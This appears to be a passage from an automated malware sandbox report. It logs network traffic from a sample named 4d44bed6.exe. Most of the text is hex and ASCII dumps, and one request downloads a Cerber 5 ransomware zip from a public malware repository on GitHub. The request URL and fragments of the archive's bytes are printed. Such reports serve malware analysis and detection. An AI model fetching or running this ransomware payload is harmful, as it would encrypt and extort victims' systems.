                                                                                                                                                2022-09-29 12:51:48 UTC27762INData Raw: ea 8e 11 fd 68 a8 bd 72 9b 34 f3 b7 8b 25 29 1d e2 68 f9 fe 74 44 36 99 2e 89 be a2 a3 83 33 aa c9 33 ba 90 cb f9 73 e5 bc e2 d7 01 f8 fc a7 1d f2 14 16 42 b5 49 55 39 e0 7a 4a fc 5b 7e 89 bf 5b d2 d2 31 30 09 b7 93 a6 d2 c2 93 fc 6b e9 2c 11 ad b9 f2 84 1d 49 64 c9 ac 52 13 4c 20 a4 39 0f 60 2f 9a 57 16 cb de 97 3c 6c 2f 8b f6 f3 d0 22 a8 6d 4c 42 52 a0 e1 d7 e1 60 05 8f 17 68 16 f4 9b 08 7f 4c 86 4e 85 8d 3e bf 83 4c 2a fb 63 4d b6 77 ff b0 36 e0 ea 25 1f fa 68 fd 4e e5 f2 da ee 4a 8c 2e d4 55 d5 45 9a 77 c6 79 e5 a0 20 84 22 08 44 e2 83 48 62 29 05 45 54 c6 a4 3b 51 88 a6 25 dc 8a 63 99 d7 33 67 36 8f 9b 2b 4f 4f 7e dc 06 20 73 cb 05 09 4c 2f 84 6a c1 51 1b a4 75 50 86 ab 3a 27 4a 93 f9 5f f4 cf f0 33 53 45 d2 c3 65 0f 52 07 e6 db f0 34 fb bf d4 90 64
                                                                                                                                                Data Ascii: hr4%)htD6.33sBIU9zJ[~[10k,IdRL 9`/W<l/"mLBR`hLN>L*cMw6%hNJ.UEwy "DHb)ET;Q%c3g6+OO~ sL/jQuP:'J_3SEeR4d
                                                                                                                                                2022-09-29 12:51:48 UTC27778INData Raw: 18 11 39 cc b0 26 29 3b fa 67 7d 3e bc 0d 16 9d 34 5c 9a 85 53 a5 4e ac 5d 3c b1 81 1a cb 11 c2 f6 36 2b 10 9c fe ef 14 45 62 27 49 c4 5d fb f9 4c 95 fc 2c 36 a4 19 7b 4b 21 ce fd d3 97 59 37 04 44 45 39 9a ac 8d 4b 26 d4 4a fa dc 09 7f 0c 63 08 7e f5 c6 87 2e 61 04 01 a6 e4 9c 14 6f 46 67 fe 95 d1 de 12 a7 c5 12 17 ef b0 9e 31 0c f9 39 4a 23 b6 64 56 97 b3 56 12 73 2c 66 4f 27 ae ed 8b 24 0c 65 08 de 60 0b a7 82 aa ff 53 2f c3 30 f2 60 9e da 7f 85 af 76 00 ed c7 58 c0 c5 98 64 9b 30 9d 76 5a e6 d8 c4 78 fc 0e 3b 4d 1d d9 43 7b 1c 50 ee 23 8c 2c 3c ad a5 08 b4 fd fa 3b fa a9 91 b4 34 d4 64 6b 24 15 6b 6a d2 57 bc de 2b 71 08 f6 04 c1 68 66 85 48 a0 16 5c 01 52 6b 2a 4c d7 83 2c 25 59 93 bc 47 7f 66 f7 f3 7c 58 7c b0 93 56 3a 87 a5 3e e8 dc 03 04 8d 9d 88
                                                                                                                                                Data Ascii: 9&);g}>4\SN]<6+Eb'I]L,6{K!Y7DE9K&Jc~.aoFg19J#dVVs,fO'$e`S/0`vXd0vZx;MC{P#,<;4dk$kjW+qhfH\Rk*L,%YGf|X|V:>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                5192.168.2.549705185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:17 UTC515OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:17 UTC515INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 185620
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "2a6ab7c5316fce8fcdfa21d92de6f495abe9a21496869efff37027ac0d4eb5d5"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 9E7E:A32C:78ED2E:8681D5:6335928B
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:17 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6947-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455878.549174,VS0,VE1
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: ea4e67e987f7d4bdf67de598847052a951b76ee1
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:17 GMT
                                                                                                                                                Source-Age: 166
                                                                                                                                                2022-09-29 12:51:17 UTC516INData Raw: 50 4b 03 04 14 00 01 00 08 00 01 9c f5 4a 57 39 9c 5a 62 d4 02 00 f8 e4 04 00 16 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 43 65 72 62 65 72 35 2e 65 78 65 b3 65 c3 dc f7 40 a4 56 9a af 6a f2 79 cc 2c 79 59 8b af 8c 38 0a 8c 54 10 a7 df ac af 7a 8c 29 fd c4 6e 49 ec 85 d0 b3 ed 8c 20 81 e7 7f fc 7e 72 5c 18 04 0c 93 d2 8e 0f 2e 35 72 7c 8b 97 fc cb 24 10 a0 1e 13 7d 3c 96 80 f9 8a 0c b4 3d 06 97 40 f1 3a 8d c7 b9 1b 60 0c f7 bf c0 c3 dd 3a d6 b5 b1 77 61 f3 44 af 99 7d d7 9a a9 2d 28 38 5c ec bf 85 4f c7 26 7e 99 af ed 48 bf 1f 7e 53 e2 4f 1c 29 93 32 9a 5f d5 7d 8c 9a 1a 45 92 80 a5 6e 26 4a 14 9b 3f f3 10 df ac c9 3b b1 17 e9 99 1c 76 2b 9c f7 83 4d fd bb 4e f3 b4 73 91 2f 63 d7 27 41 25 cc 91 4f 9b 5e 70 c2 ec 61 ad c0 c3 ea e5 8d 28 2b 1d 29 ae f4 f8
                                                                                                                                                Data Ascii: PKJW9ZbEndermanch@Cerber5.exee@Vjy,yY8Tz)nI ~r\.5r|$}<=@:`:waD}-(8\O&~H~SO)2_}En&J?;v+MNs/c'A%O^pa(+)
                                                                                                                                                2022-09-29 12:51:17 UTC518INData Raw: d1 84 c5 d4 4e f6 f4 7f c7 a7 1c b8 30 51 e8 9d 91 9a 16 79 a2 25 b4 d3 df c7 4a 50 85 d5 dc 4c 88 2e ad 06 da 0f 21 d5 8f 8b fb 83 fa d3 c4 3d 6a 14 15 6a 8a 1d ce af af fb 63 e8 46 9c eb 31 11 1f 63 fd db dc 01 4e d6 5e 48 1a f4 af 4d c3 3c b1 78 99 b0 fd 90 a3 0b 3c 55 6d c7 c8 93 29 5f 03 46 d1 90 28 37 5f 9e 18 47 19 62 b7 33 f3 80 31 03 63 88 39 d9 46 03 03 c5 29 88 6e d3 3a 7c ea 56 7a e7 15 77 c4 7b aa 77 a3 d3 d5 8e 16 f8 ac 49 98 b8 32 d8 41 30 75 e2 46 27 0c 4f 4a 5e 70 d1 6d d9 16 2d 20 be 45 30 fc b9 a6 45 e6 09 68 a5 f1 8d 06 3b ca 49 57 f7 46 90 06 35 f2 f9 36 29 3e 58 16 27 dc d5 d3 db c3 87 2a a6 5f cd f9 e2 8d 40 bd 6a 55 33 53 aa 4e 41 0b ad 90 e6 19 76 4a a0 11 08 bc 3c 07 63 3f 3e 55 e5 25 6f ff 68 04 86 12 f3 a3 ac 1a a0 10 7f be 42
                                                                                                                                                Data Ascii: N0Qy%JPL.!=jjcF1cN^HM<x<Um)_F(7_Gb31c9F)n:|Vzw{wI2A0uF'OJ^pm- E0Eh;IWF56)>X'*_@jU3SNAvJ<c?>U%ohB
                                                                                                                                                2022-09-29 12:51:17 UTC519INData Raw: e0 ca 21 7c 26 18 00 be af a3 fa 92 18 53 2d ec 80 7b 35 fe c9 c9 ae 2a c4 7a 7a 8b 8a 1f 2a c9 3c 1a ce fa 50 af cc f8 09 72 fb 18 db 8a 7c 0e 8f b5 c5 18 04 28 0d 53 91 74 a5 d3 3a eb 11 de f1 2f 6a 4e 66 f9 77 5e 3f a8 40 1d 71 ea a0 90 4f 13 ec 46 49 3b 85 91 a8 89 8d 3c 97 36 d8 da 81 29 ff 95 93 e9 bd 7c 46 9d 72 cb f6 d5 0f 58 ea d3 a0 91 6b 73 0f 54 dc 5f 51 8b 78 8f ba 6f 0d 79 db 4d dd 5b 9f 73 61 48 dc 9e 8f a5 02 28 b3 7f 58 af 81 c7 ac 5c 13 1b ad 23 67 50 87 8a 8d e4 91 bc cf cf e3 cd e4 50 34 96 f1 45 38 fe 96 55 0d bc f4 f0 8a d7 0d 02 8a b1 91 7a 2f ce bd dd eb cc 1c 72 38 12 81 26 a2 e0 ce 1b 17 04 9b 44 ab 36 31 ad f9 2d a7 92 23 19 3a 18 0f e5 66 e7 4f f5 ae 71 7d ac fd 25 c7 49 da f3 cd 69 52 06 1b e5 23 4e db ae 0f fa 0c f6 c9 8b 5f
                                                                                                                                                Data Ascii: !|&S-{5*zz*<Pr|(St:/jNfw^?@qOFI;<6)|FrXksT_QxoyM[saH(X\#gPP4E8Uz/r8&D61-#:fOq}%IiR#N_
                                                                                                                                                2022-09-29 12:51:17 UTC520INData Raw: b1 95 ca 00 d2 01 23 1b 31 7a 44 41 2a a0 ce c8 8a 8c a2 54 2d fb 2a 90 19 79 56 37 dd f2 81 4a 00 be 74 46 79 3f 34 6a 41 e2 26 2f 8a 05 b3 5a ae be 0d 8c 92 a3 14 a5 03 06 f2 57 c6 a0 00 78 7a 00 ff e8 eb 33 b9 5a bc 8a f5 d2 42 71 61 2d 59 74 7b 2d fc 58 eb 5b 50 d1 ab 94 fa d6 4f 82 c8 52 0f be 99 f5 2f d8 ec 1a 49 30 40 b1 03 c3 fb d3 1f 9f 3b ba d7 09 58 83 96 e6 3a f5 9d 37 2a d0 cb d1 95 0e 99 06 de c3 86 96 f6 1c 0c d8 84 13 95 7c 04 e5 6d 94 6b 85 9b ef 0c 11 f7 77 35 6d f1 8a 24 18 fc 58 a5 1e e5 f0 07 b7 06 5b 13 22 16 43 c8 86 d6 4c 8c bd 7e b7 49 d5 13 c9 e1 cc 0c 2c f9 1d fb 23 67 f4 66 11 93 b5 4e 3a 87 13 2d 6d ba f6 d8 3a 7d 0b 60 0b a0 f0 77 08 a2 0e a1 bb e8 ad 64 4c 84 9d 50 b2 03 ff 87 5b bf 36 26 b8 9d 6a 31 f3 f3 80 30 24 22 f0 7d
                                                                                                                                                Data Ascii: #1zDA*T-*yV7JtFy?4jA&/ZWxz3ZBqa-Yt{-X[POR/I0@;X:7*|mkw5m$X["CL~I,#gfN:-m:}`wdLP[6&j10$"}
                                                                                                                                                2022-09-29 12:51:17 UTC522INData Raw: 8a 2a c4 f8 91 89 1a 5d 81 8d 17 5c 48 09 db c2 d6 70 c8 40 ec dc 7e 10 a8 09 b1 11 50 4b 11 bb 35 88 1e 56 18 c3 b6 73 f4 e9 58 93 3e d6 bb f8 50 05 1f 85 47 c4 91 03 5c 57 96 4d df aa f7 f3 62 35 56 be a7 8c e1 b9 59 34 c1 bf 41 0e 15 ed 87 04 7f ae 41 f3 9a 17 6f 86 23 e8 44 bf 9b 29 94 14 c6 1c 1d f3 3b 3f 9f ee f7 03 51 31 15 28 fb 1b 57 b4 db 6a d5 8a 67 d8 90 83 07 75 03 19 b6 20 94 3a 9d 91 45 1f 46 a7 62 2e 4a f3 51 ca be 15 fe 9a bd 33 25 c4 b7 83 d6 33 00 01 b3 73 06 6c ab 09 b2 62 ec 83 44 b9 96 ae 45 cf 46 ab 45 5e f7 35 eb 08 6f b0 33 42 93 37 1a 3f 79 e4 ce 44 b9 f1 fa 26 31 2e d9 fb 95 12 bf e9 3c 72 31 30 75 60 89 53 ff 60 b5 ed ea 33 16 75 0d 3c 15 34 bb ee 4e 30 a5 80 46 b9 ed 2f 15 29 c5 3d aa 32 51 a3 c8 cc 99 b2 c0 de 96 08 6b 13 ec
                                                                                                                                                Data Ascii: *]\Hp@~PK5VsX>PG\WMb5VY4AAo#D);?Q1(Wjgu :EFb.JQ3%3slbDEFE^5o3B7?yD&1.<r10u`S`3u<4N0F/)=2Qk
                                                                                                                                                2022-09-29 12:51:17 UTC523INData Raw: f3 7a 2d ab 67 5d 75 fd ec da ee e2 3c 28 ef ea 02 43 29 18 7b f6 4c 1e ab 2c d9 93 a0 d0 23 3d 12 ef 10 19 0e 69 d2 74 7b 12 2f 6d fe d0 54 cf 72 9e 28 4b 58 d2 0f b8 69 b7 8d 61 11 26 52 6e 53 51 ce 18 88 d5 6d 93 6e 34 38 57 b9 e6 13 30 17 6d 88 9d e9 5d bb 12 83 e7 50 15 0e ad c0 4d fc ba 2e fc b7 2d 8c bc d7 7b ca 0c 6e 0d 73 83 1d 09 9a 8b 65 ef 20 50 4d f9 3c 01 14 86 47 dc ef e7 47 c3 38 59 d7 8a 53 d8 33 57 a8 99 7e 16 34 31 59 bb 79 af 32 89 80 e9 c1 d8 c7 c2 64 7b 6b 59 47 50 a6 40 3e 52 d2 18 14 c5 22 e6 88 79 aa 85 48 f4 1e fd 23 8c c5 75 56 40 97 be 91 1d fa a4 0a 78 db 75 c8 15 7c b3 0d 07 95 93 a4 8c 52 0d 96 32 e6 69 09 64 f0 e4 f5 7f b2 a6 b6 f1 7a 68 08 e6 3c 72 ac 68 1e 71 50 6f 3e ae 5b 8f 01 ca 68 70 7e f8 73 79 19 52 e0 b7 e0 27 24
                                                                                                                                                Data Ascii: z-g]u<(C){L,#=it{/mTr(KXia&RnSQmn48W0m]PM.-{nse PM<GG8YS3W~41Yy2d{kYGP@>R"yH#uV@xu|R2idzh<rhqPo>[hp~syR'$
                                                                                                                                                2022-09-29 12:51:17 UTC524INData Raw: bf 7c 25 8e c2 c9 aa 08 83 0e c2 68 e1 04 8c 82 d5 55 7c dc 99 29 49 dc f7 c6 15 b1 1f b7 5e 4f dc d9 46 8a 05 e1 1b 09 c0 54 99 20 ef 67 ad b6 30 bd e9 83 07 a7 f5 b1 83 60 1f 0b 35 3e 0a 68 ed 2d ad 54 1e f3 e3 e6 bc 95 d6 b5 12 9e bf b8 84 6f 2b df 9b e0 f7 0f f4 a1 11 f8 6e 9e e7 37 b9 00 68 2a a6 4c dc a7 97 61 8a a8 10 24 f9 e8 30 f9 e7 b6 04 4d 1e db 93 bc c2 85 bf 53 7a 1c 0c 0a 98 d7 ff d5 ee 6b 7c 55 93 da 75 05 9a 68 fc 8b e9 db a4 5a 36 d6 8b b8 7a 96 ed 20 af 4b f0 e1 8f b7 b8 6f 7e 7b 71 78 5e c5 eb 71 80 61 44 aa 11 92 78 92 f9 d7 49 08 91 57 78 37 82 ed 4b 49 6d dc 30 aa 59 79 d1 d6 3b 76 b2 ec 43 86 8a c9 b0 d8 7d 86 49 d3 a1 fb 32 d5 30 17 22 10 ea ab ae 64 32 5d ce 9e 29 12 3f c4 ba 1d bc 11 71 cc 44 c0 c1 0a 10 19 23 b3 b3 1c f4 1b e2
                                                                                                                                                Data Ascii: |%hU|)I^OFT g0`5>h-To+n7h*La$0MSzk|UuhZ6z Ko~{qx^qaDxIWx7KIm0Yy;vC}I20"d2])?qD#
                                                                                                                                                2022-09-29 12:51:17 UTC526INData Raw: 48 fc f7 dd 84 86 31 d7 41 75 61 f1 d6 42 07 f1 9a 00 14 2d 61 cd c8 f4 f0 d1 f2 f9 71 a0 0e 89 73 58 38 09 07 d0 ce 4f 59 31 78 0c 90 ad e8 f5 3d bd 8a 81 d5 bd f1 8b 87 f5 ce 73 e0 a2 89 e6 6b 84 8d c8 7a 36 92 2e 99 a9 c5 58 3b a2 c7 3f 22 4e 8a d5 4d 83 ae eb 15 af c3 52 c1 7d f9 9d 4c c1 f3 bd 1b b4 98 70 93 7c 5d d4 4b 63 3d 5f 65 ff df 79 85 cd 68 8d 1d 7d 3c 1a c8 32 a7 c9 82 41 86 1d 51 e2 7c 74 41 e9 83 3e 56 01 91 93 30 8a 23 5c 3d b9 d3 1a 5a 7c 32 7e b6 9e 48 29 05 08 60 1c 90 78 b2 06 f8 4e 88 94 86 16 7a 3a b9 9b 2b 12 90 c0 5d 6a 01 f9 45 16 87 7f 9e e5 19 51 9c 09 de 93 ed f0 9b 62 dd 74 41 bf fb 8e f1 fe 90 a6 93 db 2d 16 97 29 9a cd 82 10 46 b5 e7 3f 4c 3c 3d 65 66 af e0 d9 ff 14 52 8b 0b 2e 8c 39 da 67 bb 3a 0a d9 a1 8b 4c ea 36 64 4b
                                                                                                                                                Data Ascii: H1AuaB-aqsX8OY1x=skz6.X;?"NMR}Lp|]Kc=_eyh}<2AQ|tA>V0#\=Z|2~H)`xNz:+]jEQbtA-)F?L<=efR.9g:L6dK
                                                                                                                                                2022-09-29 12:51:17 UTC527INData Raw: f4 75 34 ba 52 b4 52 83 cc 26 fb eb af b2 47 ec ec c3 bf 8a 38 3e 24 97 83 ec ef 8d 3b a0 5e 6f af 3f dc 96 b5 b1 e8 16 1f 57 23 0d f6 3d d3 d5 16 d6 3c a4 20 7d c3 fa a1 95 e2 27 5c 70 07 8e f2 2f 4c a4 97 68 55 41 c6 07 8d 96 8c f2 41 dc 6c f3 70 ef 2d e9 f6 25 bf b1 8e e4 b0 3a 8a 95 6b 32 34 c4 37 92 c2 16 95 b8 54 7b 1b 25 a3 60 18 3e 4f 2d 54 f5 ef 43 0e d9 a9 e4 b6 86 4f d5 52 95 c3 9b f0 50 ac 98 f0 9f 99 27 70 a3 c3 87 33 4b 24 84 6b 1c 91 ae 37 f3 bd 14 3c f3 68 91 47 d3 4b cf 31 67 38 8e 39 43 a6 98 9f 40 37 c3 94 25 9a e8 04 32 f4 51 2a 9d ae 94 47 1d 7a ba 13 6a 05 bc ba 1f 44 92 15 7b 2f 1d 42 d8 43 1d 02 e0 cf f8 ca c9 58 fb be 98 a0 26 e2 4a bb aa f2 fe fb 14 90 af 6b 34 44 e4 1a 44 7c a6 1a f8 e8 e1 e1 56 41 eb a2 2f fc b9 7c c6 d7 08 5f
                                                                                                                                                Data Ascii: u4RR&G8>$;^o?W#=< }'\p/LhUAAlp-%:k247T{%`>O-TCORP'p3K$k7<hGK1g89C@7%2Q*GzjD{/BCX&Jk4DD|VA/|_
                                                                                                                                                2022-09-29 12:51:17 UTC528INData Raw: 68 a4 f5 2a 19 a9 5a f7 a0 49 b4 9b ae 6c 71 ed 85 c4 15 e9 8d 45 fc ce 67 19 a0 58 e4 4a c1 11 a6 c3 07 4d b4 8e 49 83 6d 6d 51 e0 4c c2 7f 26 58 9e 6e 08 ce f8 ce 18 71 5a db f3 da 00 9d c4 db 33 97 0e 75 d2 6c f6 d8 66 df 40 2a bf 6d 7c 61 14 6d 3b 35 00 8b 2c 3d f0 47 32 7a 5d ba 4a e0 62 42 71 c3 77 69 b3 fb cf 7d 21 fc 46 e6 50 e1 6f f0 ba 0c 91 a6 bd be aa e0 15 57 76 5c 6d 37 ba 8e b2 a7 52 6b dc 56 01 1f 73 ca 54 e2 dc b9 99 06 ce d5 f3 67 ba 68 d2 42 91 ad 24 09 d9 3a 33 43 f0 a8 e7 a9 5e 8d 7a 4b 4d 93 30 7b 23 9d 7d 64 97 62 b8 b0 2c 7f 7d 86 28 6e 1e 5c b8 be 88 75 13 b4 03 56 22 0a dd 50 7d a6 b8 10 b5 a3 8f 1c 6b 86 c3 19 54 30 4a a1 44 14 b0 fc ca c0 56 5e e5 5b 0d 60 d6 32 0a 23 c4 59 8b 45 53 0c 09 dc 3d 1c 50 08 3f e5 c7 4e a6 2b ae 44
                                                                                                                                                Data Ascii: h*ZIlqEgXJMImmQL&XnqZ3ulf@*m|am;5,=G2z]JbBqwi}!FPoWv\m7RkVsTghB$:3C^zKM0{#}db,}(n\uV"P}kT0JDV^[`2#YES=P?N+D
                                                                                                                                                2022-09-29 12:51:17 UTC530INData Raw: f0 b6 ff 5e 86 bd 6d 4b 60 ba ce ca eb 1c ab c1 ac 61 85 f7 06 87 04 c1 e5 77 2a c5 4b ad 39 6e d9 3a 53 98 43 8a a9 9c 4a 6d 0b 8f 54 17 57 99 7a cd 0e b2 85 e9 3e 21 33 7d 8c 02 8d a9 aa a4 b0 c6 f2 b3 36 84 bd eb 63 ec a5 ac 3a 2f 68 65 ed a0 8b c1 11 fd 5d 89 01 c4 e7 a8 b9 a4 bf 87 57 75 01 ce f1 eb 41 de 8e f2 99 75 6b 73 24 1d 42 d8 7b a8 e4 d2 39 ae 9e 99 13 3e 1e 18 f7 f2 f5 86 05 ee d1 d5 df 49 fe 3d fc 77 5b 93 64 09 75 66 ae 92 07 b0 19 2a a3 14 03 8c 05 af d0 ad d1 dc bb b8 22 a1 41 6a 1d 13 da 67 1e 0c 37 2a 93 71 1e 1a f7 fa 8d d4 73 b5 8f 34 a1 2b c3 fc d6 3f cb f6 80 0e 8b 75 20 c4 ff d3 b1 70 0d 4c 07 c1 9f 38 a1 75 56 ee 1f 1a 00 22 0f e4 b2 12 15 dd 63 12 24 d1 c3 35 9e 28 37 01 d5 22 2e 2c 01 eb b9 45 06 b1 0a 08 f4 93 84 a8 1f 5a ce
                                                                                                                                                Data Ascii: ^mK`aw*K9n:SCJmTWz>!3}6c:/he]WuAuks$B{9>I=w[duf*"Ajg7*qs4+?u pL8uV"c$5(7".,EZ
                                                                                                                                                2022-09-29 12:51:17 UTC531INData Raw: df 0b b4 96 3b 14 03 55 cd 0e 2b 6d d4 12 a9 22 63 a6 41 19 1b 00 19 d4 9b 88 9a 44 69 63 0d 98 45 59 fe 7c ec 0d e8 e4 1a 3a ca d1 34 d3 16 6e fe 00 f9 70 f0 2a 1b be c4 2e 74 ae d9 c8 49 cf 71 51 01 2c 74 23 c1 14 34 ff 0a b7 d2 9a 86 69 07 31 43 fb d6 d3 34 dd 85 3d 21 5a 06 b1 20 39 53 18 62 ba e1 8c 4a bf 9f 78 04 bc 9b 0d 9f 98 fd 73 d3 48 e8 f7 22 5e bc 19 2a 98 5f e3 c4 22 f4 d9 ed 7c df 51 8a 02 87 ed 49 b9 b6 ab eb 48 69 c6 4b d9 bf b3 51 91 84 6e 60 5b 07 e4 1e b9 3a 9e b6 8f 25 f3 70 11 65 0d 24 91 36 4d 26 d2 10 a1 db 11 cc 1f f6 3f a9 e5 99 a1 d5 26 35 f9 b5 ee 29 91 39 ef e3 fd 2f 3c ce 61 49 22 83 ef 6b 8d 79 90 16 25 56 cc 76 e8 37 01 e5 31 2b 07 c4 61 7e 67 9e 1e f5 08 7d 1b b8 b4 f7 70 b4 82 22 38 04 b8 c9 17 05 d5 b7 4c c7 4e 96 09 d0
                                                                                                                                                Data Ascii: ;U+m"cADicEY|:4np*.tIqQ,t#4i1C4=!Z 9SbJxsH"^*_"|QIHiKQn`[:%pe$6M&?&5)9/<aI"ky%Vv71+a~g}p"8LN
                                                                                                                                                2022-09-29 12:51:17 UTC531INData Raw: 91 f7 25 70 99 e8 5f f8 48 e6 a8 16 17 99 dc b6 51 d8 6d 2b a5 a9 57 9a 79 db 40 75 74 cc 66 2d 8c 0a 06 f9 6f 7e dc 53 7d 94 32 43 43 e9 98 66 7e 44 8f 28 c1 59 0d dd 73 e8 b0 9a 25 f1 c3 7a 50 84 ab a6 b1 d4 19 46 60 32 76 3a 86 7d 48 17 4f 50 35 c7 9c b6 e6 72 e2 95 42 39 a8 79 94 eb 2c 02 6f 9f d5 0f 7e 54 c4 3c 33 7f 77 c3 97 99 de 1b 21 14 7f cb a6 d9 29 87 c6 5f 44 3a 17 70 bd fe e2 fc 3f ca 08 b9 c8 6a c5 b8 c7 bb 79 74 35 79 dd 5e eb 54 37 73 51 95 08 24 14 72 48 f9 aa f9 9e 07 87 a2 05 ac 17 73 33 7f 12 95 71 30 f7 c1 61 e1 0a ac 14 5a e3 d7 12 67 d3 8b af 49 bc 88 eb 97 c9 00 c0 e4 02 86 94 44 f2 10 5f 5a 59 a3 fa 58 65 1c 57 56 66 9b f4 09 94 46 22 3d 9c 19 fb 11 d6 6f 19 4b b4 28 be 06 e1 63 42 e7 da d2 da 34 9a 10 22 cb a5 31 6a c3 b3 b0 e1
                                                                                                                                                Data Ascii: %p_HQm+Wy@utf-o~S}2CCf~D(Ys%zPF`2v:}HOP5rB9y,o~T<3w!)_D:p?jyt5y^T7sQ$rHs3q0aZgID_ZYXeWVfF"=oK(cB4"1j
                                                                                                                                                2022-09-29 12:51:17 UTC547INData Raw: b6 67 dc 14 31 58 19 f2 1f 0f 8e 06 22 d3 57 15 72 f4 42 06 d7 4f f1 83 13 69 64 06 a8 0d 76 7e 13 22 46 95 f3 d8 93 01 c5 4c 25 e2 d1 84 f5 fc 29 11 96 d8 ba 22 d2 48 7b 22 08 5f c2 1e fe 3a f1 46 ec 80 89 d8 77 97 31 08 f1 bd cb 38 30 b0 9f 91 23 b4 e8 af e3 69 8d 19 97 f5 f5 4a 99 f7 da 3b d2 4c 1b 96 6a d3 e1 5f 68 a5 00 e7 06 16 29 ae 20 d7 0e 8c 60 8f 9d 61 73 12 4b 3f cb a9 a4 3b c0 6f 2d 0a ee b2 3e 57 23 f4 39 59 16 66 65 80 69 97 3a 0a ca 0e 30 32 4d a4 93 6c f8 20 0d 77 a1 e9 a5 73 97 d2 f2 47 a5 b1 c3 c8 51 f5 35 d1 a4 9d 0c 66 45 26 24 ef 00 f8 8a 28 22 5b 61 a4 76 ae de 77 33 30 b9 e2 e0 eb dd 2b a7 76 51 bc f2 be c7 bc 41 46 b7 6d e1 bd c7 2e 23 cf c5 17 88 95 4b b2 58 c7 46 75 b2 b2 b2 92 c5 1d ca c4 01 34 c3 09 97 af c3 2c 74 f3 5d 26 81
                                                                                                                                                Data Ascii: g1X"WrBOidv~"FL%)"H{"_:Fw180#iJ;Lj_h) `asK?;o->W#9Yfei:02Ml wsGQ5fE&$("[avw30+vQAFm.#KXFu4,t]&
                                                                                                                                                2022-09-29 12:51:17 UTC563INData Raw: 9d de 4d 9a 8e 59 8d c1 b2 14 3d 9e 92 ed fd 47 2d fd da 4d 94 db 7e a0 48 9f d2 9d 29 e3 eb 4b 25 0c 57 b4 5f df e1 22 87 ce 6e a3 71 92 1e 54 d6 f9 d6 31 90 1f cc fb de c0 90 07 33 cb e9 b3 99 ee f4 13 00 15 d5 ec 65 4c 16 4e a3 54 30 bd fa 6c d2 ae 0e c1 3c 03 ec 80 d5 cd bf 1a ad 79 6a b2 65 c7 9f 66 a7 be de 44 74 24 72 96 4d 81 6f 1d e6 88 58 fc 8e 20 98 11 1d 18 27 6e 72 bd b5 c5 8d f9 81 fb cf d0 3b 24 06 f3 f8 b2 62 19 8d 5c 37 72 e6 b0 9c e7 8e 4e 3a a3 5b 19 ce e1 aa f3 29 29 22 3f 15 96 8f 77 c4 1e e4 40 7c 89 7e fb dd d5 94 bc aa 30 db 1c 55 67 62 f2 27 fe e4 ef 3a b5 16 8c 6c 23 80 eb 1c 0a 4f db 11 de a6 06 ac f4 02 85 38 ea f0 a8 49 06 1f d0 43 b4 ad 60 d6 b5 b7 f4 60 ec 4c 3a 0e cd de aa 3b c5 61 e4 70 d5 f8 fd c8 b5 0b 0c e7 38 0c d1 c5
                                                                                                                                                Data Ascii: MY=G-M~H)K%W_"nqT13eLNT0l<yjefDt$rMoX 'nr;$b\7rN:[))"?w@|~0Ugb':l#O8IC``L:;ap8
                                                                                                                                                2022-09-29 12:51:17 UTC579INData Raw: 26 58 c4 6f c1 18 0b 51 41 9c 3a 4f 19 2a ec fa 4c 17 70 3f 35 09 86 db 43 3b b7 8b 78 47 45 08 2b 85 af 10 69 71 d9 c9 a8 5c 74 1d e9 d1 e2 40 9a dc 7c f3 a8 39 63 5b d7 fd d9 8c 65 b3 ae ac e1 64 5b 74 b5 6d 6d 95 92 5b 29 a1 fd 20 5b 6c 52 5a 7c ec dd 0b ec 7b 5c b6 2b 77 5d 1c a0 36 51 5e 9c 2b 99 13 88 2c 1a 91 ab 63 37 63 bd 67 17 79 03 e8 84 d8 66 a6 ab e6 f3 f5 f4 db b5 13 ec 04 9e d9 36 32 f7 95 d5 23 37 57 cc 6b ff d6 ac ae 18 28 d5 b9 b0 1e 55 4a 21 ea 71 72 4a 60 a3 97 5a cd 39 62 39 a1 9e 4e e8 18 54 0d 30 07 0c 78 5d 8f 1d 2c 10 7d c1 40 f7 86 6b eb 81 4b b2 15 a9 db 17 51 db e6 5f cc a3 d1 53 73 df ef 66 3a 8b f2 b7 8e 58 e1 5c 30 79 f6 a4 48 9b 75 e4 16 63 c3 fa 3a 7d 63 e5 fe 76 1e f5 f3 01 c1 db be 5b 16 81 cc 39 9c f5 f7 8c 17 e5 15 95
                                                                                                                                                Data Ascii: &XoQA:O*Lp?5C;xGE+iq\t@|9c[ed[tmm[) [lRZ|{\+w]6Q^+,c7cgyf62#7Wk(UJ!qrJ`Z9b9NT0x],}@kKQ_Ssf:X\0yHuc:}cv[9
